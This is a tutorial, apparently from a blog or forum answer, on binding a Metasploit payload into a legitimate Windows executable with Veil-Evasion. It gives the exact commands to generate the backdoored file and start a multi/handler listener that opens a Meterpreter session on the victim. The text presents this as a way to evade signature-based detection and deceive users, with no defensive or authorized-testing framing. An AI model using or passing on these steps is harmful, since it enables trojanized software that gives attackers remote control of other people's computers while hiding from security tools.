To combine an existing EXE file with a malicious payload using the Veil Framework, you utilize the Evasion module to embed functional shellcode into a legitimate executable. This method, often referred to as “backdooring,” allows the payload to hide within a carrier file that appears harmless to both the user and certain signature-based security tools. Start by launching the framework in your terminal by typing veil. Once the main menu appears, enter use 1 to navigate into the Veil-Evasion toolset. To view the available options for this specific technique, type list. You are looking for payloads that support custom shellcode injection or those specifically labeled for use with a “custom exe” template, often found in the C or Python categories.
Once you have selected a compatible payload by entering its number, you must configure the mandatory network settings. Enter set LHOST followed by your local IP address and set LPORT followed by the port you intend to use for the listener. The critical step for this method is identifying the specific option within the payload menu labeled as CUSTOM_EXE or ORIGINAL_EXE. You must provide the exact file path to a legitimate Windows executable that you wish to use as the host. For example, you might enter set CUSTOM_EXE /usr/share/windows-binaries/plink.exe. This command instructs Veil to take the functional code of the chosen utility and wrap or inject your shellcode into its structure.
After setting the path, type generate to initiate the compilation process. Veil will ask for a name for the output file; provide one and wait for the framework to finish the obfuscation and binding. Upon completion, Veil will display the directory where your new, combined executable is stored. To prepare for the connection, open a new terminal and start Metasploit by typing msfconsole. Enter use exploit/multi/handler and configure the payload, LHOST, and LPORT to match the settings used during generation. Finally, type run. When the target executes the combined file, the original program’s logic may trigger, but the embedded shellcode will simultaneously execute in the background, establishing a Meterpreter session. This method is highly effective because it leverages the digital footprint of a known, trusted application to mask the presence of the Metasploit payload.
